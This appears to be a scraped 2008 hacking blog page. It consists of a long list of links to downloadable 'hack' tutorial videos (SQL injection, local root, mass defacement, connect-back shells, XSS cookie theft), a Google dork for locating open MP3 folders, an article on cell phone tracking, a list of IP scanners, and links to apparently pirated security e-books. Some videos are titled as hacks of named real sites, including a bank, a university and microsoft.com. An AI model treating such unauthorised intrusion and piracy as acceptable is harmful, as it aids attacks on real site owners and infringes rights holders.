Film-Download/download.asp?DownloadID=31

Video hack web site system mercuryboard_xss

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=32

Video hack net share pc_hack

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=33

Video hack web site system vzlom_minibb

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=34

Video hack web site system 4images

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=35

Video hack web site system Sapphplesson

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=36

Video hack web site system he11.net_ledforums-xss

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=37

Video hack web site system flashchat2

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=38

Video hack web site system planet gallery

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=39

Video hack system nc

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=40


Video hack system dcom32

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=41


Video hack web site system mail2forum

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=42


Video hack web site system jportal_1

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=43

Video hack server isp

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=44

Video hack web site system fusion

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=45


Video hack web site system fastbbxss

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=46

Video hack web site system cnv131

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=47


Video hack web site system hack_phpBB15

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=48


Video hack learningsearch

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=49

Video hack web site system wwwthreads1

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=50


Video hack web site system aix

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=51


Video hack web site system dlm

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=52


Video hack web site system tnt

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=53


Video hack web site system zmail

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=54


Video hack web site system lj

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=55


Video hack web site system phpweb

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=56


Video hack web site proxy2

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=57


Video hack web site system mirc-hack

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=58

Video hack web site system xmbxss

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=59


Video hack web site system minibb_1.6

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=60

Video hack web site system phpbb_downloads

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=61


Video hack web site system sr_guestbook

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=62


Video hack web site system ultimate php board (upb) v1.9

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=63


Video hack web site system frb

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=64


Video hack web site system liteforum2

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=65

Video hack web site system online_games

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=66


Video hack web site system asp

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=67

Video hack system kaht2

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=68

Video Crack winrar30b

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=69


Video hack system lsas

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=70

Video hack web site system zener

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=71


Video hack web site system He11.net_Forums_v1.0

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=72


Video hack web iisbug

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=73

Video hack crack soft ware

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=74

Video hack web site system d-link2100ap

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=75


Video hack web site system flashchat

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=76


Video hack web site shirazcenter&iranni.com&iranni.net

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=77


Video hack portal ezusermanager

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=78


Video hack portal ibarc

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=79


Video sshdynamicportforwarding

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=80

Video hack site larestannews

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=81


Video hack server massdeface

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=82


Video hack server localroot

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=83


Video hack portal php-nuke 7.8

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=84


Video hack portal poll

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=85

Video mysqlroot&linux

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=86


Video hack portal nabopoll 1.2

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=87


Video hack pass admin mybb

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=88


Video hack php-nuke-module-postguestbook-0.6.1

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=89

Video hack portal Scriptmagix-lyrics

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=90

Video hack magic photo storage website

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=91

Video hack Mangobery-cms-0.5.5

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=92

Video namayeshghah tezhoshan

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=93


Video hack portal phpnuke-rfi

http://www.larestankids.com
/Film-Download/download.asp?DownloadID=94


Video hack & log-arez

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=95

Video hack portal pixaria-gallery-1

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=96

Video hack site daneshgal

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=97

Video hack agri-bank

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=98

Video hack irancms.net

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=99

Video hack portal elkagroup

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=100

Video hack server local exploit

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=101

Video hack server sql_root

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=102

Video hack server isp router hacking

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=103

Video hack apachi

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=104

Video hack 4images-private

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=105

Video hack php-sql-injecetion

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=106

Video hack Asp-Access-sql-injection

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=107

Video hack Asp-mssql-sql-injection

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=108

Video hack vBulletin

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=109

Video program cracking

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=110

Video DNS server setup

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=111

Video Shell sql injection

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=112

Video Bug research lfi

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=113

Video shell hacking cc

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=114

Video hack microsoft.com

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=115

Video local xpl over flow

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=116

Video RoboT-_-Yahoo-_-Mesenger

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=117

Video hack EzaspsQ

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=118

Video hack Entertainment cms admin

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=119

Video hack deface by xss

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=120

Video hack loginswf

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=121

Video hack sql-phpnuke

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=122

Video find cms and vulnerability

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=123

Video xoops glossaires

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=124

Video System volume Information

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=125

Video bof

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=126

Video mass,root 2.6.8

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=127

Video wmf file code execution vulnerability with metasploit

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=128

Video Root 2.6.11

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=129

Video phpmyadmin_hacking

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=130

Video connect-back

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=131

Video xss & sim-cookie

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=132

Video exploit+sql-injection+v2.0

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=133

Video sql tums.ac.ir

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=134

Video sql-finding-begin

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=135

Video save-user-pass-in-vb

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=136

Video gholf cd

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=137

Video hack databases-sql injection attacks&common configur

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=138

Video blind sql

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=139

Video farsi-sql-injection-pro

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=140

Video zancart

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=141

Video mysql-injection(medium)

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=142

Video hack-forums

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=143

Video rooting-sql

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=144

Video history_vzlom

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=145

Video blind-sql-injection advance

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=146

Video cback via safe on

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=147

Video Yahoohigh

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=148

Video mash

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=149

Video logs_code_injection

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=150

Video samba

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=151

Monday, November 3, 2008

Hacking Google: Turning a Search Engine into an MP3 Downloader


Yes, that's right. You can take everyone's favorite all-purpose search engine and turn it into a web-crawling, MP3 ripping demon for you. The procedure itself isn't as hard as you would think either.

First a little bit of a primer on Google. The Search Engine itself has a bunch of extra bells and whistles beyond "AND", "OR", and "NOT" in defining your search queries. We're not going to go through all of them now (Although that may be a good follow up article soon.), but suffice to say that if you spend enough time using Google, there are other search strings you can use to further narrow down your searches. (Check Advanced Google Searching for more Information.)

Copy / Paste the code below into your Google search box:

Code:
-inurl:(htm|html|php) intitle:"index of" +"
last modified" +"parent directory"
+description +size +(wma|mp3) ""

Where is either the name of the band you're searching for music for OR the name of the song you're looking for.

That's the hack in a nutshell, but if you're interested to see how it works, keep reading. Let's take a few moments to dismantle it and see what is happening in the search query.

Code:
-inurl:(htm|html|php) intitle:"index of"+"last modified" +"parent directory"

The first flag, -inurl restricts the Google queries without htm, html, and php pages, and has "index of" within the title. "Index Of" is a common flag that distinguishes website repositories, folder views of groupings of files on the internet. In a nutshell the first part of the query narrows down Google search results to pages you wouldn't ordinarily see, but nonetheless are logged and tracked by Google as it parses the net for new content.

Code:
+description +size +(wma|mp3) ""

In particular, this search will narrow down these repositores to include only sites with wma and mp3 files related to the BANDNAME or SONG you are searching for.

It should be noted though, that we at Haywire Hacking do not condone the illegal download of music: under federal law, if you own a copy of the correlating CD or published work of the author, you are entitled to a digital copy of the music

Mobile - Cell phone tracking using Google maps

Did you know that your mobile phone sends out details on your whereabouts every second to the world? If you haven’t heard of it, then its high time to realize that the cell phone in your pocket is tracking every move of yours and sharing the data with third party apps. Just like a GPS system or any other much powerful and better system, it is tracking your every move. S60 (Symbian 60) based mobile phones report location using cell tower based location tracking system and it is possible to trace the location on Google maps.

Install ‘Google maps’ on any S60 based mobile phone (like Nokia E51, E71, N73, N96) and press the option “My Location” from the “Options” menu. It will show you the location within 100 meters to 2 km depending on the cell tower and network availability. In places where there is good connectivity, it will track you down more efficiently than any GPS device, which won’t work indoor.

“Google maps” is distributed free by Google and you can install it without any hassle by visiting


http://m.google.com
. All you need is an active GPRS/ EDGE /3G connection to make it work. Nokia maps and other mapping software do not have this feature and it works only via a GPS device at the moment.

Give it a try.

What does it mean to Google? Why they want to track mobile users?

Google as always wants to sell its advertisements through all mediums practically possible. The multi billion giant wants to know ‘what you want’ (Google search); ‘what you do’ (Gmail, Calendar, Docs etc); what you see- ‘(YouTube) to sell their so called targeted ads. Imagine the possibility of displaying the ads about your local coffee shop on your mobile; imagine the reach and relevance of the advts you will be seeing. So they are simply enhancing their ‘free’ software and want to track you even without GPS

Is it possible to track a GSM/ CDMA cellular phone? Is there a software in market which tracking the location of the phone? Is it possible to track lost mobile?

The one word answer is YES and the descriptive answer is as follows

Tracking cell phone without any software

Any GSM/ CDMA cellular service providers can pin point the location of the users within a certain area. Every few minutes cell phone sends the signal back to the service provider announcing the location of the handset. The nearest cell/ mobile tower picks the signal and alerts the central server that the user is within that certain cell site and all calls should be routed to that site. The same information can be used by service providers to track the cell phone. Though they won’t publish the information publically, they used to co-operate with law enforcement officers to track suspicious mobile numbers.

Tracking cell phone with software

Companies like this

http://www.microlmts.net
provide software’s (LMTS) which can be installed in a mobile phone. This type of software’s are meant to track the phone if it’s stolen and not used for tracking the location of the mobile phone. The software works like this. The software once installed sits silently in the phone memory and detect any change in mobile number. When ever we replace the SIM (or if the thief does), it prepares an SMS and send the new mobile number to two (or more) predefined numbers set by the original owner of the phone.(or the International Mobile Subscriber Identity (IMSI)).

Powered with the above information we can contact law enforcement officers to track the location of the cell phone. This is not a foul proof method as it’s quite possible that the person who took the phone can start the phone without a SIM card and then format the phone memory to wipe out any existing software or data. (Without SIM card means no SMS sent out)

Using IMEI number

International Mobile Equipment Identity or the IMEI number can also be used to track stolen cell phone if we are getting good support from law enforcement officers and service providers. Each GSM mobile phone has a unique number which is called IMEI number. The service provider keeps track of this number to identify the phone in the network.

Suppose if the phone is stolen and we are giving the instruction in writing to all the service providers to track the cell phone, the providers can easily find the location or disable the phone to function in that particular network. This makes the phone practically useless and thereby discourages further theft.

But for this method we need lot of support from the service providers. As every city might be having 6-10 providers and each of them having its on rules, it will be a haunting process to make it work.

Other than that there are no viable solution available at the moment which tracks the location of the cell phone on a GSM or a CDMA network

Collection of some IP Scanners

  • Super Scan
  • Angry IP Scanner
  • IP Scan
  • Net Scan
  • Winfingerprint

Download

Saturday, November 1, 2008

Hacking E-Books Collection.....

Hacking Exposed 5


One of the international best-selling. The book walks through how to use the more powerful and popular hacker software, including L0phtCrack. This new edition has been updated extensively, largely with the results of "honeypot" exercises (in which attacks on sacrificial machines are monitored) and Windows 2000 public security trials. There's a lot of new stuff on e-mail worms, distributed denial-of-service (DDoS) attacks, and attacks that involve routing protocols. Hacking Exposed wastes no time in explaining how to implement the countermeasures--where they exist--that will render known attacks ineffective.

Code:
www.insecure.in/ebooks/hacking_exposed_5.rar

Internet Denial Of Service


Internet Denial of Service sheds light on a complex and fascinating form of computer attack that impacts the confidentiality, integrity, and availability of millions of computers worldwide. It tells the network administrator, corporate CTO, incident responder, and student how DDoS attacks are prepared and executed, how to think about DDoS, and how to arrange computer and network defenses. It also provides a suite of actions that can be taken before, during, and after an attack. Inside, you'll find comprehensive information on the each and every topic relating denial-of-service attacks.

Code:
www.insecure.in/ebooks/internet_denial_of_service.rar

Computer Viruses For Dummies


It offers real, practical solutions to help ordinary users keep viruses out of their e-mail in-boxes-and explains how to respond when one slips through-
* In 2003, there was a major virus attack almost every month, which cost businesses worldwide an estimated $55 billion and did untold damage to home computers.
* Explains what viruses are and how they work, profiles major anti-virus software packages, shows how to keep anti-virus software updated, and helps people adopt safer computer work habits.
* The book’s value price and compact size will make it irresistible to people who need to protect their home PC or network.

Code:
www.insecure.in/ebooks/computer_viruses_for_dummies.rar

Hackin9


This book will help you learn:
* How to use Google to find sources of personal information and other confidential data.
* How to find information about vulnerable systems and Web services.
* How to locate publicly available network devices using Google.

Code:
http://www.insecure.in/ebooks/dangerous_google_searching.rar

Hack Attacks Testing


A network security breach (a hack, crack, or other invasion) occurs when unauthorized access to the network is achieved and havoc results.
The best possible defense is an offensive strategy that allows you to regularly test your network to reveal the vulnerabilities and close the holes before someone gets in.
Written by veteran author and security expert John Chirillo, Hack Attacks Testing explains how to perform your own security audits.
* Paperback: 576 pages

Code:
www.insecure.in/ebooks/hack_attacks_testing.rar

Secrets Of A Super Hacker


Here is the most amazing book ever published on computer hacking. Step-by-Step illustrated details on the techniques used by hackers to get your data including :-
Guessing Passwords, Stealing Passwords,
Password Lists, Social Engineering,
Reverse Social Engineering,
Crashing Electronic Bulletin Boards,
Dummy Screens, Fake E-mail,
Trojan Horses, Viruses, Worms,
Trap Doors, And Much more.
Anyone concerned with computer security and data privacy needs to read this book.

Code:
www.insecure.in/ebooks/secrets_of_super_hacker.rar

Hacking Gmail


Everything about GMail including :-
Inside GMail, Conquering GMail, Desktop Integration, GMail Power Tips, Skinning GMail, How GMail Works, GMail & Greasemonkey, GMail Libraries, Building API, Using GMailFS, etc..........!

Code:
www.insecure.in/ebooks/hacking_gmail_2007.rar

Stealing The Network


How to Own a Shadow is the final book in Syngress ground breaking, best-selling, Stealing the Network series. As with previous title, How to Own a Shadow is a fictional story that demonstrates accurate, highly detailed scenarios of computer intrusions and counter-strikes. Readers will be amazed at how Knuth, Law Enforcement, and Organized crime twist and torque everything from game stations, printers and fax machines to service provider class switches and routers steal, deceive, and obfuscate. From physical security to open source information gathering, Stealing the Network: How to Own a Shadow will entertain and educate the reader on every page. The books companion Web site will also provide special, behind-the-scenes details and hacks for the reader to join in the chase for Knuth.

Code:
http://www.insecure.in/ebooks/stealing_network_how_to_own_shadow.rar
-: Network Security Embarrassed



Cisco Press(March 19, 2008) CCIE Professional Development Series Network Security Technologies and Solutions
Network
Security Technologies and Solutions is a comprehensive reference to the
most cutting-edge security products and methodologies available to
networking professionals today.
This book helps you understand and
implement current, state-of-the-art network security technologies to
ensure secure communications throughout the network infrastructure.
This
book is part of the Cisco CCIE Professional Development Series from
Cisco Press, which offers expert-level instruction on network design,
deployment, and support methodologies to help networking professionals
manage complex networks and prepare for CCIE exams.

Code:
http://www.insecure.in/ebooks/net_security_tech.rar

-: Hacker's HandBook Embarrassed



This book is a practical guide to discovering and exploiting security flaws in web applications. The authors explain each category of vulnerability using real-world examples, screen shots and code extracts. The book is extremely practical in focus, and describes in detail the steps involved in detecting and exploiting each kind of security weakness found within a variety of applications such as online banking, e-commerce and other web applications. The topics covered include bypassing login mechanisms, injecting code, exploiting logic flaws and compromising other users. This handbook describes a proven methodology that combines the virtues of human intelligence and computerized brute force, often with devastating results.

Code:
http://www.insecure.in/ebooks/webapp_hackers_handbook.rar

-: Vulnerability Management Embarrassed



Get all the Facts and See How to Implement a Successful Vulnerability Management Program. As a business owner, or someone responsible for network security within your organization, you need to understand how to prevent attacks and eliminate network weaknesses that leave your business exposed and at risk.
Vulnerability Management for Dummies arms you with the facts and will help :-
Explain the critical need for Vulnerability Management (VM), Detail the essential best-practice steps of a successful VM Program, Outline the various VM Solutions - including the pros & cons of each, Highlight the award-winning QualysGuard VM solution, Provide a 10-point checklist for removing vulnerabilities from your key resources.

Code:
http://www.insecure.in/ebooks/vulnerability_management_for_dummies.rar

-: Hacking Windows Vista Embarrassed



Vista is the most radical revamping of Windows since 1995. However, along with all the fantastic improvements, there are a couple of things that likely drive you up the wall. Don’t worry, though—just join forces with author Steve Sinchak and you’ll end up feeling as though Microsoft designed Vista just for you! He shows you how to tweak logon screen settings, build custom Sidebar gadgets, personalize Aero Glass with themes and visual styles, turn your PC into an HDTV media center, fine-tune your firewall, and more...

Code:
http://www.insecure.in/ebooks/vista_hacks.rar

-: Viruses Revealed Embarrassed



With the growing number of computer virus infections today--and the billions of dollars spent on clean-up efforts--virus protection has become everybody's business.
This detailed guide offers full-scale coverage and analysis of the origin, structure, and technology behind the expanding array of computer viruses, and addresses current methods of detection and prevention.

Code:
http://www.insecure.in/ebooks/viruses_revealed.rar

-: Hacker's Black-Book Embarrassed



Easy to understand with many examples. Every day you hear in the daily news about hackers, virus, worms and trojans, SUB7, TCP, IP, PING, spoofing, sniffing, DDOS attacks, ...?
And you don't know exactly what it is and how hackers do that.
Don't rest a "lamer", Hacker's Blackbook let's you know and discovers many secrets.
Incredible how easy hacking and cracking is!
The book shows how simple you can use these programs.
And many more themes in 19 detailed chapters...

Code:
http://www.insecure.in/ebooks/hackers_black_book.rar

-: 501 Website Secrets Embarrassed



What kind of secrets are included in 501 Web Site Secrets? Well, using this book is as simple as turning to the chapter on a particular site, reading through the secrets, then trying them on your own. You don’t need any particular technical expertise to take advantage of these secrets, although some familiarity with the sites in question is helpful. There’s no fancy programming, no high-level coding, just a lot of common-sense information that you probably didn’t know before. Containing:-
Yahoo!, Google, AOL, MSN, Amazon, Lycos, Ask, Altavista, Microsoft, etc........!

Code:
http://www.insecure.in/ebooks/501_website_secrets.rar

-: Gray Hat Hacking Embarrassed



A
fantastic book for anyone looking to learn the tools and techniques
needed to break in and stay in. Very highly recommended whether you are
a seasoned professional or just starting out in the security business.
Basically divided into five parts :-
Part I: Introduction to Ethical Disclosure,
Part II: Penetration Testing and Tools ,
Part III: Exploits 101,
Part IV: Vulnerability Analysis,
Part V: Malware Analysis

Code:
http://www.insecure.in/ebooks/gray_hat_hacking.rar

-: Hacker Highschool Embarrassed



The Hacker Highschool project is the development of license-free, security and privacy awareness teaching materials and back-end support for teachers of elementary, junior high, and high school students. Today's teens are in a world with major communication and productivity channels open to them and they don't have the knowledge to defend themselves against the fraud, identity theft, privacy leaks and other attacks made against them just for using the Internet. This is the reason for Hacker Highschool.

Code:
http://www.insecure.in/ebooks/hacker_highschool_13ebooks.rar

-: CheatBook-2008 Embarrassed



Cheat-Book (02/2008) - Issue February 2008 - A Cheat-Code Tracker with Hints for several popular PC Action and adventure Games. 488 PC Games, 53 Walktroughs for PC and 114 Console Cheats are represented in this new version from Strategy Games, Adventure Games to Action Games. This Database represents all genres and focuses on recent releases.

Code:
http://www.insecure.in/ebooks/cheatbook_2008.rar

-: A Little Black Book Embarrassed



"A Little Black Book Of Computer Viruses" is the first in the series of three. Deeply covers all the basic types along with source codes. It focuses on topics like:- types of viruses, functional elements of viruses, tools used for writing viruses, storage for viruses, installation in memory, etc. Source codes also given for TIMID, INTRUDER, KILROY, STEALTH, Basic Boot Sector, etc. viruses.

Code:
http://www.insecure.in/ebooks/black_book_of_compuer_viruses.rar

-: Hacking GPS Embarrassed



Hacking GPS shows you how to get more out of owning a GPS receiver. Written with the Extreme Technology community in mind, this book shows you how to do a variety of different things with your receiver:
* Build custom cabling
* Protecting your GPS from the elements
* Connecting your GPS to a PC or PDA
* Build and mount external antennas
* Load new, modified, firmware onto your device
* Access secret diagnostic screens and test utilities
* GPS games & much more...!
If you've got a GPS and you want to be able to make the most of it then this is the book for you!

Code:
http://www.insecure.in/ebooks/hacking_gps.rar

-: Oracle Hackers Handbook Embarrassed



While Oracle continues to improve the security features of its product, it still has a long way to go. David Litchfield has devoted years to relentlessly searching out the flaws in this ubiquitous database system and creating defenses against them. Now he offers you his complete arsenal to assess and defend your own Oracle systems.
This in-depth guide explores every technique and tool used by black hat hackers to invade and compromise Oracle. It shows you how to find the weak spots and defend them. Without that knowledge, you have little chance of keeping your databases truly secure.
Discover how to deal with the security flaws revealed in the Oracle RDBMS. Explore some never-before-published forays into Oracle security holes and learn to defend them from attack.

Code:
http://www.insecure.in/ebooks/oracle_hackers_handbook.rar

-: Security & Cryptography Embarrassed



6th International Conference, SCN 2008, Amalfi, Italy, September 10-12, 2008, Proceedings

Editors: Rafail Ostrovsky, Roberto De Prisco and Ivan Visconti
Hardcover: 423 pages
Publisher: Springer; 1 edition (September 1, 2008)
Language: English
ISBN-10: 3540858547
ISBN-13: 978-3540858546
Format: pdf
This book constitutes the refereed proceedings of the 6th International Conference on Security and Cryptology for Networks, SCN 2008, held in Amalfi, Italy, in September 2008

Code:
http://www.insecure.in/ebooks/sec_crypt_networks.rar

-: Shellcoder's Handbook Embarrassed



The Shellcoders Handbook, discovering and exploiting security holes is the second edition. It covers introduction to exploitation: linux on x86 contains stack overflows, shellcodes, format string bugs, heap overflows. Also for windows platform and solaris exploitation too. OS X shellcode, cisco ios exploitaion, unix kernel overflows, windows kernel hacking, protection mechnism and much more.....!

Code:
http://www.insecure.in/ebooks/the_shellcoders_handbook.rar